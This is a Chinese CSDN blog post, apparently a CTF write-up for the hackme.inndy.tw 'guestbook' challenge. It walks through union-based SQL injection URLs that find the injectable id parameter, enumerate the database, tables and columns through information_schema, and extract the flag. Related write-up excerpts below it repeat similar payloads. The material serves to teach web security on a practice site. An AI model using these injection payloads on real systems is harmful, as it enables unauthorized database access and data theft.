hackme guestbook

最新推荐文章于 2020-10-31 12:16:19 发布
最新推荐文章于 2020-10-31 12:16:19 发布
阅读量629 收藏
点赞数
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43511698/article/details/102631907
版权

guestbook

题目提示:This guestbook sucks. sqlmap is your friend. 是sql注入
点击Message List 时是空的, 点击post是可以提交新信息,点击查看新信息
在这里插入图片描述
在id值后加上" ’ "测试是否存在测试点网页报错说明存在注入点
union 注入
查看列

https://hackme.inndy.tw/gb/?mod=read&id=-1%20union%20select%201,2,3,4%20#
//id=-1 是让前面的内容不显示

3被回显

1.查看数据库名

https://hackme.inndy.tw/gb/?mod=read&id=-1%20union%20select%201,2,database(),4%20#

在这里插入图片描述
数据库的名字g8
2.查看表名

https://hackme.inndy.tw/gb/?mod=read&id=-1 union select 1,2,(select table_name from information_schema.tables where table_schema=database() limit 0,1),4#

发现有一个表 flag
3.测试表的字段

https://hackme.inndy.tw/gb/?mod=read&id=-1 union select 1,2,(select column_name from information_schema.columns where table_name='flag' limit 1,1),4#

仍然显示flag
4.读取flag

https://hackme.inndy.tw/gb/?mod=read&id=-1 union select 1,2,(select flag from flag limit 1,1),4#

得到flag
在这里插入图片描述

一路走到黑1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Hackme Writeup
wywwzjj
05-21 1万+
https://wywwzjj.top/2019/02/02/Hackme-Writeup/ hide and seek Can you see me? I’m so close to you but you can’t see me. 这题查看源码即可。 guestbook This guestbook sucks. sqlmap is your friend. 既然提示有 sqlmap...
GuestBook示例程序源码
07-20
GuestBook示例程序源码 ASP.NET Mvc + NHibernate + Unity Application Block 示例程序 今天无意间看到了Unity Application Block (以下简称Unity),感觉很不错,用起来挺方便的说。于是一时兴起写了这个留言本的小示例。数据库操作采用的NHibernate,UI直接用的 ASP.NET Mvc了。项目基于VS2010 + SQLServer 2005 ,就一个表的增删改查操作很简单。目的是为了体验下Unity的Ioc功能。 项目只是演示使用,未建立公共类和配置项抽象出来等工作,各个项目如下: Guestbook.Biz 业务层,具体业务实现。这里只实现了增删改查 Guestbook.Dal 持久层,基于NHibernate的ORM映射。实现增删改查 Guestbook.IBiz 业务层接口,给UI引用实现解藕。UI层不直接引用具体业务类,实现面向接口 Guestbook.IDal 持久层接口,给Biz引用实现解藕。方便更换不同数据库持久类(PS;虽然NHibernate 已经可以支持多库,这里纯为了娱乐) Guestbook.Model 持久实体,NHibernate的映射文件也放到这个类库里面了 Guestbook.Unity 简单封装了一下Unity,传入相应接口即可New相应的在Web.Config中配置的具体业务类 Guestbook.Web UI层,ASP.NET Mvc项目。控制器直接引用的业务接口IBiz和Model还有Unity其它全部不引用
[hackme] helloworld
Selukwe的博客
03-03 426
下载地址:https://hackme.inndy.tw/static/helloworld 解题过程 方法一: 1、拖进IDA,F5看代码。 2、从代码很容易就可以看到,有个if进行判断,如果n是314159265,就可以输出flag。 方法二: 1、从汇编里面,分析flag初始时的值是什么。 2、从代码里面可以看到,flag的每一位与n进行异或运算...
guestbookhackme web部分writeup)
cggwz的信息飞船
10-31 661
题目链接 打开链接可以发现,是一个公告栏,可以自己提交标题和内容,然后会在网页上显示出来。 网页源代码肯定啥也没有,抓包也是没有有用的信息,我们考虑flag在服务器的数据库内,所以我们就想到用sql注入。那么数据库的信息会显示在哪儿呢?那就是我们提交的标题内容显示的地方,我们先随便提交一些数据,比如标题为12,内容为34。提交后,查看信息,我们通过网址来进行注入。 首先我们有用的一个尝试: https://hackme.inndy.tw/gb/?mod=read&id=-1 union select
hackme re [helloworld simple passthis pyyy]
ACdream
02-06 664
helloworld:拖入IDA里看一下就知道数了 simple-rev:拖入IDA里看一下 s = "UIJT.JT.ZPVS.GMBH" r = "" for i in s: r += chr(ord(i) - 1) print r passthis: a = [0xC1, 0xCB, 0xC6, 0xC0, 0xFC, 0xC9, 0xE8, 0xAB, 0xA7, 0xDE,...
guestbook_yyunxt_GuestBook_
09-30
在互联网上,GuestBook是早期网站常见的互动功能,允许访客留下他们的信息、评论或者建议。这个特定的 GuestBook 实现可能是用于帮助网站管理员收集用户反馈,增强与访问者之间的互动。 【描述】中提到,该应用是...
ext_guestbook.rar_GuestBook
09-21
《EXT GuestBook:基于EXT UI引擎的留言板系统详解》 EXT GuestBook是一个专为EXT初学者设计的墙式留言板系统,其核心特点是采用EXT作为用户界面(UI)引擎,为用户提供了一个直观、交互性强的留言体验。EXT是一个...
bbs.rar_GuestBook
09-22
总的来说,"bbs.rar_GuestBook"程序是一个值得研究的实例,它展示了如何在非标准环境下实现一个实用的交互系统。通过学习和分析这个程序,开发者不仅可以深化对数据存储、用户交互和程序安全的理解,还能激发对非...
pctf.rar_GuestBook
最新发布
09-24
【标题】"pctf.rar_GuestBook" 是一个基于Java技术实现的简易访客留言簿应用。这个项目的核心功能是允许用户在其中添加自己的内容,实现类似在线留言板的功能,为用户提供互动交流的平台。 【描述】提到,该...
ylb.zip_GuestBook
09-19
《简单留言本(Simple Guestbook)1.0_ylb:PHP编程学习的宝贵资源》 在互联网技术领域,PHP作为一种广泛使用的服务器端脚本语言,是构建动态网站和应用程序的重要工具。今天我们要探讨的是“ylb.zip_GuestBook”,...
hackme.inndy.tw的rop题目
10-15
hackme.inndy.tw的rop题目,如果那个网站被墙或者关闭的话可以从这里下载
hackme(web wp)
Xi4or0uji
09-06 4281
oj说了不要直接给flag,所以就只写思路啦~ hide and seek 源码就有了 Guestbook 这题是SQL注入 看数据库 ?mod=read&id=-1 union select 1,2,database(),4# 然后就看到数据库是g8 表 ?mod=read&id=-1 union select 1,2,(select table_name fr...
Hackme-Misc-wp
qq_41509200的博客
09-13 1279
Hackme-Misc-wp 背景: 这几天老师要求我们把hackme的题目做出来,于是便开始了新的征程,一定把全部flag找出来 题目及解题思路 1、Flag All flags are in this format: FLAG{This is flag’s format} 题目描述中就是flag FLAG{This is flag's format} 2、corgi can fly ...
Hackme CTF】Misc--corgi can fly
VZZmieshenquan的博客
04-21 849
Description: Corgi is cute, right? Pillow (Python) and Bitmap (.NET) are your friends. (Maybe you can try stegsolve) Solution: 点击链接后加载出一张图,下载下来 用stegsolve查看图片,发现一张二维码 扫描二维码获得flag Flag: FLAG{C...
hackme.inndy.tw raas 经验总结
qq_43189757的博客
08-05 211
相关资料: Glibc内存管理 如果有人看我的总结的话直接看资料就行了,堆之类的我也刚接触,不怎么熟悉 UAF漏洞原理是 在释放较小的堆块的时候不会立马把这个堆块放到small bins 当中,而会把这个堆块放到fast bins当中, 当需要再次分配堆块的时候会优先再 fast bins寻找合适的堆块,找到了则返回,如果没找到才会去small bins中寻找空闲的堆块。利用这个特性可以造成堆块重...
hackme inndy pwn onepunch writeup
charlie_heng的专栏
12-31 487
继续来做题目,这次的pwn主要功能是一个任意地址写一个字节,然后就结束。。。。 然后找了半天。。。完全没思路。。。一个字节只能写一次。。。。 然后找了下别人的wp,发现代码段居然可以写,那骚操作就可以有很多了 这里比较写入的字节是否为255,是的话就输出No flag for you jnz loc_400773二进制是\x75\x0a 0a是偏移,我们只要把这个弄成负数,就可以...
Hackme CTF】Web--scoreboard
VZZmieshenquan的博客
04-21 515
Description: DO NOT ATTACK or SCAN scoreboard, you don’t need to do that. Solution: 抓包发现flag在x-flag头里 Flag: FLAG{Header can hide some data aswell.}
CTF中SQL注入范例
weixin_45625861的博客
10-10 276
guestbook 题目提示:This guestbook sucks. sqlmap is your friend. 是sql注入 点击Message List 时是空的, 点击post是可以提交新信息,点击查看新信息 在id值后加上" ’ "测试是否存在测试点网页报错说明存在...
ASP.NET MVC4新手教程:从guestbook入门
在书中,作者通过一个简单的Guestbook项目为例,带领读者逐步理解MVC(Model-View-Controller)架构的核心理念。MVC4是ASP.NET框架中的一个重要组成部分,它将应用程序分为三个独立的组件:模型(Model)负责数据...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值